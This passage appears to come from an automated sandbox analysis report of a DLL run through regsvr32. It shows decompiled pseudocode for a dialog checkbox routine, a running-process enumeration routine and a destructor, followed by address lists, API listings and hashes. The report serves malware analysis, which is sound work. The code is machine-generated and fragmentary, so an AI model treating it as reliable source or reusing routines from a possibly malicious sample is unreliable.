								__ecx = __edi;
								__eax = E1001D1C2(__ecx, 0x3f8);
								__edx =  *(__eax + 0x20);
								__eax = SendMessageA( *(__eax + 0x20), 0xf1, 1, 0);
								goto L55;
							case 2:
								__ecx = __edi;
								__eax = E1001D1C2(__ecx, 0x3f9);
								__eax = SendMessageA(__eax, 0xf1, 1, 0);
								goto L55;
							case 3:
								__ecx = __edi;
								__ecx =  *(E1001D1C2(__edi, 0x3fa) + 0x20);
								__eax = SendMessageA(__ecx, 0xf1, 1, 0);
								goto L55;
						}
					}
					L55:
					_t148 =  *(_t295 + 0x78);
					__eflags = _t148;
					_t241 = _t295;
					if(_t148 == 0) {
						_t149 = E1001D1C2(_t241, 0x3fd);
						_push(0);
						_push(1);
						_push(0xf1);
						_push( *((intOrPtr*)(_t149 + 0x20)));
						goto L62;
					} else {
						_t167 = _t148 - 1;
						__eflags = _t167;
						if(_t167 == 0) {
							_t168 = E1001D1C2(_t241, 0x3fe);
							_push(0);
							_push(1);
							_push(0xf1);
							_push( *((intOrPtr*)(_t168 + 0x20)));
							goto L62;
						} else {
							__eflags = _t167 == 2;
							if(_t167 == 2) {
								_t171 = E1001D1C2(_t241, 0x3ff);
								_push(0);
								_push(1);
								_push(0xf1);
								_push( *((intOrPtr*)(_t171 + 0x20)));
								L62:
								SendMessageA();
							} else {
								E10018B24(_t241, 0x10056cf8, 0, 0);
							}
						}
					}
					_t152 =  *(_t295 + 0x7c);
					__eflags = _t152;
					_t243 = _t295;
					if(_t152 == 0) {
						_t153 = E1001D1C2(_t243, 0x3f5);
						_push(0);
						_push(1);
						_push(0xf1);
						_push( *((intOrPtr*)(_t153 + 0x20)));
						goto L68;
					} else {
						__eflags = _t152 == 1;
						if(_t152 == 1) {
							_t165 = E1001D1C2(_t243, 0x3f6);
							_push(0);
							_push(1);
							_push(0xf1);
							_push( *((intOrPtr*)(_t165 + 0x20)));
							L68:
							SendMessageA();
						} else {
							E10018B24(_t243, 0x10056cf8, 0, 0);
						}
					}
					_t157 =  *(_t295 + 0x80);
					__eflags = _t157;
					_t244 = _t295;
					if(_t157 == 0) {
						return SendMessageA( *(E1001D1C2(_t244, 0x400) + 0x20), 0xf1, 1, 0);
					} else {
						__eflags = _t157 == 1;
						if(_t157 == 1) {
							return SendMessageA( *(E1001D1C2(_t244, 0x401) + 0x20), 0xf1, 1, 0);
						} else {
							return E10018B24(_t244, 0x10056cf8, 0, 0);
						}
					}
				} else {
					_push(__ebx);
					_push(1);
					E1001956C(__ecx, __ecx, _t297, _t301);
					_push(0);
					E1001956C(__ecx, __ecx, _t297, _t301);
					_t221 =  *(__ecx + 0x84);
					_t285 =  !( *(_t297 + 0x18));
					_t302 = _t285 & 0x00000001;
					if((_t285 & 0x00000001) == 0) {
						_push( *((intOrPtr*)(_t297 + 0x14)));
						_push(2);
						E10020287(_t221, _t285, __ecx, _t297, _t302);
					}
					if( &(( *(_t297 + 0x28))[1]) >  *((intOrPtr*)(_t297 + 0x2c))) {
						E1001FA65(_t297);
					}
					_t286 =  *(_t297 + 0x28);
					 *( *(_t297 + 0x28)) = _t221;
					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
					_t222 =  *(_t295 + 0x74);
					_t201 =  !( *(_t297 + 0x18));
					_t304 = _t201 & 0x00000001;
					if((_t201 & 0x00000001) == 0) {
						_push( *((intOrPtr*)(_t297 + 0x14)));
						_push(2);
						E10020287(_t222, _t286, _t295, _t297, _t304);
					}
					if( &(( *(_t297 + 0x28))[1]) >  *((intOrPtr*)(_t297 + 0x2c))) {
						E1001FA65(_t297);
					}
					 *( *(_t297 + 0x28)) = _t222;
					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
					_t223 =  *(_t295 + 0x78);
					_t259 =  !( *(_t297 + 0x18));
					_t306 = _t259 & 0x00000001;
					if((_t259 & 0x00000001) == 0) {
						_push( *((intOrPtr*)(_t297 + 0x14)));
						_push(2);
						E10020287(_t223,  *((intOrPtr*)(_t297 + 0x14)), _t295, _t297, _t306);
					}
					if( &(( *(_t297 + 0x28))[1]) >  *((intOrPtr*)(_t297 + 0x2c))) {
						E1001FA65(_t297);
					}
					 *( *(_t297 + 0x28)) = _t223;
					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
					_t224 =  *(_t295 + 0x7c);
					_t290 =  !( *(_t297 + 0x18));
					_t308 = _t290 & 0x00000001;
					if((_t290 & 0x00000001) == 0) {
						_push( *((intOrPtr*)(_t297 + 0x14)));
						_push(2);
						E10020287(_t224, _t290, _t295, _t297, _t308);
					}
					if( &(( *(_t297 + 0x28))[1]) >  *((intOrPtr*)(_t297 + 0x2c))) {
						E1001FA65(_t297);
					}
					_t291 =  *(_t297 + 0x28);
					 *( *(_t297 + 0x28)) = _t224;
					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
					_t296 =  *(_t295 + 0x80);
					_t206 =  !( *(_t297 + 0x18));
					_t310 = _t206 & 0x00000001;
					if((_t206 & 0x00000001) == 0) {
						_push( *((intOrPtr*)(_t297 + 0x14)));
						_push(2);
						E10020287(_t224, _t291, _t296, _t297, _t310);
					}
					if( &(( *(_t297 + 0x28))[1]) >  *((intOrPtr*)(_t297 + 0x2c))) {
						E1001FA65(_t297);
					}
					_t207 =  *(_t297 + 0x28);
					 *_t207 = _t296;
					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
					return _t207;
				}
			}

















































                                                                                                                0x10002d70
                                                                                                                0x10002d72
                                                                                                                0x10002d76
                                                                                                                0x10002d7a
                                                                                                                0x10002d7e
                                                                                                                0x10002d80
                                                                                                                0x10002d83
                                                                                                                0x10002ea1
                                                                                                                0x10002ea3
                                                                                                                0x10002ea8
                                                                                                                0x10002ea9
                                                                                                                0x10002eab
                                                                                                                0x10002eab
                                                                                                                0x10002eb0
                                                                                                                0x10002eb3
                                                                                                                0x10002eb6
                                                                                                                0x10002eb9
                                                                                                                0x10002ec0
                                                                                                                0x10002ec4
                                                                                                                0x10002ec9
                                                                                                                0x10002ec9
                                                                                                                0x10002ed3
                                                                                                                0x10002ed9
                                                                                                                0x10002edc
                                                                                                                0x10002ee0
                                                                                                                0x10002ee5
                                                                                                                0x10002ee6
                                                                                                                0x10002ee7
                                                                                                                0x10002ee7
                                                                                                                0x10002eec
                                                                                                                0x10002eef
                                                                                                                0x10002ef2
                                                                                                                0x10002ef5
                                                                                                                0x10002ef7
                                                                                                                0x10002efb
                                                                                                                0x10002f00
                                                                                                                0x10002f00
                                                                                                                0x10002f0a
                                                                                                                0x10002f0d
                                                                                                                0x10002f10
                                                                                                                0x10002f14
                                                                                                                0x10002f19
                                                                                                                0x10002f1a
                                                                                                                0x10002f1b
                                                                                                                0x10002f1b
                                                                                                                0x10002f20
                                                                                                                0x10002f23
                                                                                                                0x10002f26
                                                                                                                0x10002f29
                                                                                                                0x10002f2b
                                                                                                                0x10002f2f
                                                                                                                0x10002f34
                                                                                                                0x10002f34
                                                                                                                0x10002f3e
                                                                                                                0x10002f41
                                                                                                                0x10002f44
                                                                                                                0x10002f48
                                                                                                                0x10002f4d
                                                                                                                0x10002f4e
                                                                                                                0x10002f4f
                                                                                                                0x10002f4f
                                                                                                                0x10002f54
                                                                                                                0x10002f57
                                                                                                                0x10002f5a
                                                                                                                0x10002f5d
                                                                                                                0x10002f5f
                                                                                                                0x10002f63
                                                                                                                0x10002f68
                                                                                                                0x10002f68
                                                                                                                0x10002f72
                                                                                                                0x10002f75
                                                                                                                0x10002f78
                                                                                                                0x10002f7c
                                                                                                                0x10002f81
                                                                                                                0x10002f82
                                                                                                                0x10002f83
                                                                                                                0x10002f83
                                                                                                                0x10002f88
                                                                                                                0x10002f8b
                                                                                                                0x10002f8e
                                                                                                                0x10002f91
                                                                                                                0x10002f93
                                                                                                                0x10002f97
                                                                                                                0x10002f9c
                                                                                                                0x10002f9c
                                                                                                                0x10002fa6
                                                                                                                0x10002fac
                                                                                                                0x10002fb5
                                                                                                                0x10002fb5
                                                                                                                0x10002fbe
                                                                                                                0x10002fc0
                                                                                                                0x10002ff5
                                                                                                                0x10002ffd
                                                                                                                0x10002fff
                                                                                                                0x10003001
                                                                                                                0x10003006
                                                                                                                0x00000000
                                                                                                                0x10002fc2
                                                                                                                0x10002fc2
                                                                                                                0x10002fc5
                                                                                                                0x10002fdc
                                                                                                                0x10002fe4
                                                                                                                0x10002fe6
                                                                                                                0x10002fe8
                                                                                                                0x10002fed
                                                                                                                0x10003007
                                                                                                                0x10003007
                                                                                                                0x10002fc7
                                                                                                                0x10002fd0
                                                                                                                0x10002fd0
                                                                                                                0x10002fc5
                                                                                                                0x10003009
                                                                                                                0x1000300c
                                                                                                                0x1000300f
                                                                                                                0x10003097
                                                                                                                0x10003011
                                                                                                                0x10003011
                                                                                                                0x00000000
                                                                                                                0x10003031
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000303a
                                                                                                                0x1000303c
                                                                                                                0x10003041
                                                                                                                0x1000304e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10003057
                                                                                                                0x10003059
                                                                                                                0x1000306b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10003074
                                                                                                                0x1000307b
                                                                                                                0x10003088
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10003011
                                                                                                                0x1000309c
                                                                                                                0x1000309f
                                                                                                                0x1000309f
                                                                                                                0x100030a2
                                                                                                                0x100030a4
                                                                                                                0x100030f7
                                                                                                                0x100030ff
                                                                                                                0x10003101
                                                                                                                0x10003103
                                                                                                                0x10003108
                                                                                                                0x00000000
                                                                                                                0x100030a6
                                                                                                                0x100030a6
                                                                                                                0x100030a6
                                                                                                                0x100030a9
                                                                                                                0x100030de
                                                                                                                0x100030e6
                                                                                                                0x100030e8
                                                                                                                0x100030ea
                                                                                                                0x100030ef
                                                                                                                0x00000000
                                                                                                                0x100030ab
                                                                                                                0x100030ab
                                                                                                                0x100030ae
                                                                                                                0x100030c5
                                                                                                                0x100030cd
                                                                                                                0x100030cf
                                                                                                                0x100030d1
                                                                                                                0x100030d6
                                                                                                                0x10003109
                                                                                                                0x10003109
                                                                                                                0x100030b0
                                                                                                                0x100030b9
                                                                                                                0x100030b9
                                                                                                                0x100030ae
                                                                                                                0x100030a9
                                                                                                                0x1000310e
                                                                                                                0x1000310e
                                                                                                                0x10003111
                                                                                                                0x10003113
                                                                                                                0x10003148
                                                                                                                0x10003150
                                                                                                                0x10003152
                                                                                                                0x10003154
                                                                                                                0x10003159
                                                                                                                0x00000000
                                                                                                                0x10003115
                                                                                                                0x10003115
                                                                                                                0x10003118
                                                                                                                0x1000312f
                                                                                                                0x10003137
                                                                                                                0x10003139
                                                                                                                0x1000313b
                                                                                                                0x10003140
                                                                                                                0x1000315a
                                                                                                                0x1000315a
                                                                                                                0x1000311a
                                                                                                                0x10003123
                                                                                                                0x10003123
                                                                                                                0x10003118
                                                                                                                0x10003162
                                                                                                                0x10003162
                                                                                                                0x10003165
                                                                                                                0x10003167
                                                                                                                0x100031bd
                                                                                                                0x10003169
                                                                                                                0x10003169
                                                                                                                0x1000316c
                                                                                                                0x1000319e
                                                                                                                0x1000316e
                                                                                                                0x1000317f
                                                                                                                0x1000317f
                                                                                                                0x1000316c
                                                                                                                0x10002d89
                                                                                                                0x10002d89
                                                                                                                0x10002d8a
                                                                                                                0x10002d8e
                                                                                                                0x10002d93
                                                                                                                0x10002d97
                                                                                                                0x10002d9f
                                                                                                                0x10002da5
                                                                                                                0x10002da7
                                                                                                                0x10002daa
                                                                                                                0x10002daf
                                                                                                                0x10002db0
                                                                                                                0x10002db2
                                                                                                                0x10002db2
                                                                                                                0x10002dc4
                                                                                                                0x10002dc8
                                                                                                                0x10002dc8
                                                                                                                0x10002dcd
                                                                                                                0x10002dd0
                                                                                                                0x10002dd2
                                                                                                                0x10002dd8
                                                                                                                0x10002ddb
                                                                                                                0x10002ddd
                                                                                                                0x10002ddf
                                                                                                                0x10002de4
                                                                                                                0x10002de5
                                                                                                                0x10002de7
                                                                                                                0x10002de7
                                                                                                                0x10002df4
                                                                                                                0x10002df8
                                                                                                                0x10002df8
                                                                                                                0x10002e00
                                                                                                                0x10002e02
                                                                                                                0x10002e08
                                                                                                                0x10002e0b
                                                                                                                0x10002e0d
                                                                                                                0x10002e10
                                                                                                                0x10002e15
                                                                                                                0x10002e16
                                                                                                                0x10002e18
                                                                                                                0x10002e18
                                                                                                                0x10002e25
                                                                                                                0x10002e29
                                                                                                                0x10002e29
                                                                                                                0x10002e31
                                                                                                                0x10002e33
                                                                                                                0x10002e39
                                                                                                                0x10002e3c
                                                                                                                0x10002e3e
                                                                                                                0x10002e41
                                                                                                                0x10002e46
                                                                                                                0x10002e47
                                                                                                                0x10002e49
                                                                                                                0x10002e49
                                                                                                                0x10002e56
                                                                                                                0x10002e5a
                                                                                                                0x10002e5a
                                                                                                                0x10002e5f
                                                                                                                0x10002e62
                                                                                                                0x10002e64
                                                                                                                0x10002e6a
                                                                                                                0x10002e70
                                                                                                                0x10002e72
                                                                                                                0x10002e74
                                                                                                                0x10002e79
                                                                                                                0x10002e7a
                                                                                                                0x10002e7c
                                                                                                                0x10002e7c
                                                                                                                0x10002e89
                                                                                                                0x10002e8d
                                                                                                                0x10002e8d
                                                                                                                0x10002e92
                                                                                                                0x10002e96
                                                                                                                0x10002e98
                                                                                                                0x10002e9e
                                                                                                                0x10002e9e

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1001956C: __EH_prolog3_catch.LIBCMT ref: 10019573
                                                                                                                  • Part of subcall function 10020287: __EH_prolog3.LIBCMT ref: 1002028E
                                                                                                                  • Part of subcall function 10020287: __CxxThrowException@8.LIBCMT ref: 100202C4
                                                                                                                • SendMessageA.USER32 ref: 10003007
                                                                                                                • SendMessageA.USER32 ref: 10003031
                                                                                                                  • Part of subcall function 1001D1C2: GetDlgItem.USER32(?,?), ref: 1001D1CF
                                                                                                                • SendMessageA.USER32 ref: 1000304E
                                                                                                                • SendMessageA.USER32 ref: 10003109
                                                                                                                • SendMessageA.USER32 ref: 1000315A
                                                                                                                • SendMessageA.USER32 ref: 10003199
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Exception@8H_prolog3H_prolog3_catchItemThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2494371950-0
                                                                                                                • Opcode ID: b5af775a6a57946f8b23923aa4f0b59214164ec59136e5b9549812102d34fc19
                                                                                                                • Instruction ID: ddd1a69a171d0d2141de40e4f7bce56bfba829fa2563aceb89071714a0287f58
                                                                                                                • Opcode Fuzzy Hash: b5af775a6a57946f8b23923aa4f0b59214164ec59136e5b9549812102d34fc19
                                                                                                                • Instruction Fuzzy Hash: 9DD1C674780702AFE225DB54CC92F6AB7E6EF48750F10461DF28A5F6D5CAB4F8818B50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000CD90 Relevance: 13.7, APIs: 9, Instructions: 151COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E1000CD90(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				signed int _t47;
				intOrPtr _t50;
				unsigned int _t54;
				intOrPtr* _t65;
				long** _t74;
				void* _t79;
				void* _t80;
				signed int _t95;
				signed int _t106;
				void* _t107;
				void* _t109;
				void* _t111;
				signed int _t113;
				signed int _t115;
				void* _t116;
				signed int _t117;
				void* _t119;
				intOrPtr* _t123;

				_t119 = __eflags;
				_push(0xffffffff);
				_push(E10051B38);
				_push( *[fs:0x0]);
				E1003BF10(0x1218);
				_t45 =  *0x1006dbdc; // 0xdf7c0cda
				 *(_t115 + 0x1214) = _t45 ^ _t115;
				_t47 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t47 ^ _t115);
				 *[fs:0x0] = _t115 + 0x122c;
				_t50 = E100160BC(_t119, 0x14);
				_t116 = _t115 + 4;
				 *((intOrPtr*)(_t116 + 0x14)) = _t50;
				_t113 = 0;
				 *((intOrPtr*)(_t116 + 0x1234)) = 0;
				if(_t50 == 0) {
					_t106 = 0;
					__eflags = 0;
				} else {
					_t106 = E10029DAB(_t50);
				}
				 *((intOrPtr*)(_t116 + 0x1240)) = 0xffffffff;
				 *((char*)(_t116 + 0x1030)) = 0;
				E1003BB70(_t106, _t116 + 0x1029, _t113, 0x103);
				_t117 = _t116 + 0xc;
				_push(_t117 + 0x1c);
				_push(0x1000);
				_t100 = _t117 + 0x2c;
				_push(_t117 + 0x2c);
				L100504DC();
				_t54 =  *(_t117 + 0x1c) >> 2;
				 *(_t117 + 0x14) = _t54;
				if(_t54 == 0) {
					L12:
					_t109 =  *(_t117 + 0x14);
					goto L13;
				} else {
					_t80 = GetShortPathNameA;
					do {
						_t109 = OpenProcess(0x410, 0,  *(_t117 + 0x24 + _t113 * 4));
						if(_t109 == 0) {
							goto L9;
						}
						_push(_t117 + 0x1c);
						_push(4);
						_push(_t117 + 0x28);
						_push(_t109);
						L100504D6();
						_push(0x104);
						_push(_t117 + 0x1028);
						_push( *(_t117 + 0x20));
						_push(_t109);
						L100504D0();
						GetShortPathNameA(_t117 + 0x1028, _t117 + 0x1028, 0x100);
						_t100 =  *(_t117 + 0x24 + _t113 * 4);
						E10050AB8( *(_t117 + 0x24 + _t113 * 4), _t117 + 0x112c, 0xa);
						_t117 = _t117 + 0xc;
						_t65 = E100173A6();
						_t123 = _t65;
						_t91 = 0 | _t123 != 0x00000000;
						if(_t123 != 0) {
							E10001000(_t91, _t100, 0x80004005);
							goto L12;
						}
						 *((intOrPtr*)(_t117 + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)( *_t65 + 0xc))))() + 0x10;
						_t104 = _t117 + 0x1c;
						 *((intOrPtr*)(_t117 + 0x1240)) = 1;
						E10003500(_t117 + 0x1c, 0x100585c0, _t117 + 0x1024);
						_t117 = _t117 + 0xc;
						_t95 = _t106;
						E10029F99(_t80, _t95, _t104, _t113,  *((intOrPtr*)(_t106 + 8)), _t117 + 0x18);
						_t74 =  *((intOrPtr*)(_t117 + 0x18)) + 0xfffffff0;
						 *((intOrPtr*)(_t117 + 0x1234)) = 0xffffffff;
						_t100 =  &(_t74[3]);
						asm("lock xadd [edx], ecx");
						if((_t95 | 0xffffffff) - 1 <= 0) {
							_t100 =  *( *_t74);
							 *((intOrPtr*)( *((intOrPtr*)( *( *_t74) + 4))))(_t74);
						}
						L9:
						_t113 = _t113 + 1;
					} while (_t113 <  *(_t117 + 0x14));
					L13:
					CloseHandle(_t109);
					CloseHandle( *(_t117 + 0x20));
					 *[fs:0x0] =  *((intOrPtr*)(_t117 + 0x122c));
					_pop(_t107);
					_pop(_t111);
					_pop(_t79);
					return E1003B437(_t106, _t79,  *(_t117 + 0x1214) ^ _t117, _t100, _t107, _t111);
				}
			}

























                                                                                                                0x1000cd90
                                                                                                                0x1000cd90
                                                                                                                0x1000cd92
                                                                                                                0x1000cd9d
                                                                                                                0x1000cda3
                                                                                                                0x1000cda8
                                                                                                                0x1000cdaf
                                                                                                                0x1000cdba
                                                                                                                0x1000cdc1
                                                                                                                0x1000cdc9
                                                                                                                0x1000cdd1
                                                                                                                0x1000cdd6
                                                                                                                0x1000cdd9
                                                                                                                0x1000cddd
                                                                                                                0x1000cde1
                                                                                                                0x1000cde8
                                                                                                                0x1000cdf5
                                                                                                                0x1000cdf5
                                                                                                                0x1000cdea
                                                                                                                0x1000cdf1
                                                                                                                0x1000cdf1
                                                                                                                0x1000ce05
                                                                                                                0x1000ce10
                                                                                                                0x1000ce18
                                                                                                                0x1000ce1d
                                                                                                                0x1000ce24
                                                                                                                0x1000ce25
                                                                                                                0x1000ce2a
                                                                                                                0x1000ce2e
                                                                                                                0x1000ce2f
                                                                                                                0x1000ce38
                                                                                                                0x1000ce3b
                                                                                                                0x1000ce3f
                                                                                                                0x1000cf53
                                                                                                                0x1000cf53
                                                                                                                0x00000000
                                                                                                                0x1000ce45
                                                                                                                0x1000ce45
                                                                                                                0x1000ce4b
                                                                                                                0x1000ce5d
                                                                                                                0x1000ce61
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000ce6b
                                                                                                                0x1000ce6c
                                                                                                                0x1000ce72
                                                                                                                0x1000ce73
                                                                                                                0x1000ce74
                                                                                                                0x1000ce7d
                                                                                                                0x1000ce89
                                                                                                                0x1000ce8a
                                                                                                                0x1000ce8b
                                                                                                                0x1000ce8c
                                                                                                                0x1000cea1
                                                                                                                0x1000cea3
                                                                                                                0x1000ceb2
                                                                                                                0x1000ceb7
                                                                                                                0x1000ceba
                                                                                                                0x1000cec1
                                                                                                                0x1000cec3
                                                                                                                0x1000cec8
                                                                                                                0x1000cf4e
                                                                                                                0x00000000
                                                                                                                0x1000cf4e
                                                                                                                0x1000ced6
                                                                                                                0x1000cee2
                                                                                                                0x1000ceec
                                                                                                                0x1000cef7
                                                                                                                0x1000ceff
                                                                                                                0x1000cf08
                                                                                                                0x1000cf0a
                                                                                                                0x1000cf13
                                                                                                                0x1000cf16
                                                                                                                0x1000cf21
                                                                                                                0x1000cf27
                                                                                                                0x1000cf2e
                                                                                                                0x1000cf32
                                                                                                                0x1000cf38
                                                                                                                0x1000cf38
                                                                                                                0x1000cf3a
                                                                                                                0x1000cf3a
                                                                                                                0x1000cf3d
                                                                                                                0x1000cf57
                                                                                                                0x1000cf5e
                                                                                                                0x1000cf65
                                                                                                                0x1000cf70
                                                                                                                0x1000cf78
                                                                                                                0x1000cf79
                                                                                                                0x1000cf7b
                                                                                                                0x1000cf90
                                                                                                                0x1000cf90

                                                                                                                APIs
                                                                                                                  • Part of subcall function 100160BC: _malloc.LIBCMT ref: 100160D6
                                                                                                                • _memset.LIBCMT ref: 1000CE18
                                                                                                                • EnumProcesses.PSAPI(?,00001000,?,?,00000000,00000103), ref: 1000CE2F
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,00001000,?,?,00000000,00000103), ref: 1000CE57
                                                                                                                • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 1000CE74
                                                                                                                • GetModuleFileNameExA.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 1000CE8C
                                                                                                                • GetShortPathNameA.KERNEL32 ref: 1000CEA1
                                                                                                                • __itoa.LIBCMT ref: 1000CEB2
                                                                                                                • CloseHandle.KERNEL32(?), ref: 1000CF5E
                                                                                                                • CloseHandle.KERNEL32(?), ref: 1000CF65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseEnumHandleNameProcess$FileModuleModulesOpenPathProcessesShort__itoa_malloc_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3268912965-0
                                                                                                                • Opcode ID: 00df60eecbbb03283746c588b31f46c72852db74f528f4c16e1111c64864dce6
                                                                                                                • Instruction ID: 395214f1ab154b6152452bfbc70029a431b58c0cf8f3c574ba6b343257910b72
                                                                                                                • Opcode Fuzzy Hash: 00df60eecbbb03283746c588b31f46c72852db74f528f4c16e1111c64864dce6
                                                                                                                • Instruction Fuzzy Hash: 0A518275604745AFE324DB68DC41EEBB3E9EF88350F004A2DF699C7290DB74E9448B92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000A910 Relevance: 13.6, APIs: 9, Instructions: 137COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E1000A910(void* __ebx, signed int __edx, void* __edi, void* __ebp, void* __eflags) {
				char _v4;
				char _v12;
				intOrPtr _v16;
				void* __ecx;
				void* __esi;
				signed int _t72;
				signed int** _t83;
				intOrPtr* _t89;
				void* _t90;
				void* _t106;
				void* _t108;
				intOrPtr _t113;
				signed int _t152;
				intOrPtr _t158;
				void* _t160;
				signed int _t161;
				void* _t163;

				_t163 = __eflags;
				_t160 = __ebp;
				_t156 = __edi;
				_t112 = __ebx;
				_push(0xffffffff);
				_push(E1005171C);
				_push( *[fs:0x0]);
				_push(_t113);
				_t72 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t72 ^ _t161);
				 *[fs:0x0] =  &_v12;
				_t158 = _t113;
				_v16 = _t158;
				_v4 = 0x1e;
				E1000A7A0();
				_v4 = 0x1d;
				E10020C98(_t158 + 0x13ac, __edi, _t158, _t163);
				_v4 = 0x1c;
				E100032E0(__edx, _t163);
				_v4 = 0x1b;
				E10020C98(_t158 + 0x1258, __edi, _t158, _t163);
				_v4 = 0x1a;
				E1000A860(__edx, _t163);
				_v4 = 0x19;
				E10020C98(_t158 + 0x10f4, __edi, _t158, _t163);
				_v4 = 0x18;
				E10026B7A(__ebx, _t158 + 0x1030, _t156, _t158, _t163);
				_t83 =  *((intOrPtr*)(_t158 + 0x102c)) - 0x10;
				_v4 = 0x17;
				asm("lock xadd [ecx], edx");
				_t152 = (__edx | 0xffffffff) - 1;
				_t164 = _t152;
				if(_t152 <= 0) {
					_t152 =  *( *_t83);
					 *((intOrPtr*)( *((intOrPtr*)(_t152 + 4))))(_t83);
				}
				_v4 = 0x16;
				E1001F6F7(_t158 + 0x1018);
				_v4 = 0x15;
				E10020C98(_t158 + 0xfa4, _t156, _t158, _t164);
				_v4 = 0x14;
				E1000A6F0(_t152);
				_v4 = 0x13;
				E1000A670();
				_t89 =  *((intOrPtr*)(_t158 + 0x94c)) - 0x10;
				_v4 = 0x12;
				asm("lock xadd [ecx], edx");
				_t165 = (_t152 | 0xffffffff) - 1;
				if((_t152 | 0xffffffff) - 1 <= 0) {
					_t89 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t89)) + 4))))(_t89);
				}
				_v4 = 0x11;
				_t90 = E10026994(_t89, _t112, _t158 + 0x7e0);
				_v4 = 0x10;
				E10026994(_t90, _t112, _t158 + 0x7d4);
				_v4 = 0xf;
				E10004BE0(_t160);
				_v4 = 0xe;
				E1001A3E3(_t112, _t158 + 0x670, _t156, _t158, _t165);
				_v4 = 0xd;
				E100115D0(_t112, _t158 + 0x5a4, _t156, _t158);
				_v4 = 0xc;
				E100263C8(_t158 + 0x550, _t156, _t158, _t165);
				_v4 = 0xb;
				E10021A4D(_t158 + 0x4fc, _t156, _t158, _t165);
				_v4 = 0xa;
				E10021AC4(_t158 + 0x4a8, _t156, _t158, _t165);
				_v4 = 9;
				E10021AF5(_t158 + 0x454, _t156, _t158, _t165);
				_v4 = 8;
				E10021AC4(_t158 + 0x400, _t156, _t158, _t165);
				_v4 = 7;
				E10021AC4(_t158 + 0x3ac, _t156, _t158, _t165);
				_v4 = 6;
				E1002634B(_t158 + 0x358, _t156, _t158, _t165);
				_v4 = 5;
				E10021AF5(_t158 + 0x304, _t156, _t158, _t165);
				_v4 = 4;
				E1002634B(_t158 + 0x2b0, _t156, _t158, _t165);
				_v4 = 3;
				E1001614A(_t158 + 0x2a8);
				_v4 = 2;
				E1001614A(_t158 + 0x2a0);
				_v4 = 1;
				_t106 = E1001614A(_t158 + 0x298);
				_v4 = 0;
				E10026994(_t106, _t112, _t158 + 0x27c);
				_v4 = 0xffffffff;
				_t108 = E10020C98(_t158, _t156, _t158, _t165);
				 *[fs:0x0] = _v12;
				return _t108;
			}




















                                                                                                                0x1000a910
                                                                                                                0x1000a910
                                                                                                                0x1000a910
                                                                                                                0x1000a910
                                                                                                                0x1000a910
                                                                                                                0x1000a912
                                                                                                                0x1000a91d
                                                                                                                0x1000a91e
                                                                                                                0x1000a920
                                                                                                                0x1000a927
                                                                                                                0x1000a92c
                                                                                                                0x1000a932
                                                                                                                0x1000a934
                                                                                                                0x1000a93e
                                                                                                                0x1000a946
                                                                                                                0x1000a951
                                                                                                                0x1000a956
                                                                                                                0x1000a961
                                                                                                                0x1000a966
                                                                                                                0x1000a971
                                                                                                                0x1000a976
                                                                                                                0x1000a981
                                                                                                                0x1000a986
                                                                                                                0x1000a991
                                                                                                                0x1000a996
                                                                                                                0x1000a9a1
                                                                                                                0x1000a9a6
                                                                                                                0x1000a9b1
                                                                                                                0x1000a9b4
                                                                                                                0x1000a9bf
                                                                                                                0x1000a9c3
                                                                                                                0x1000a9c4
                                                                                                                0x1000a9c6
                                                                                                                0x1000a9ca
                                                                                                                0x1000a9d0
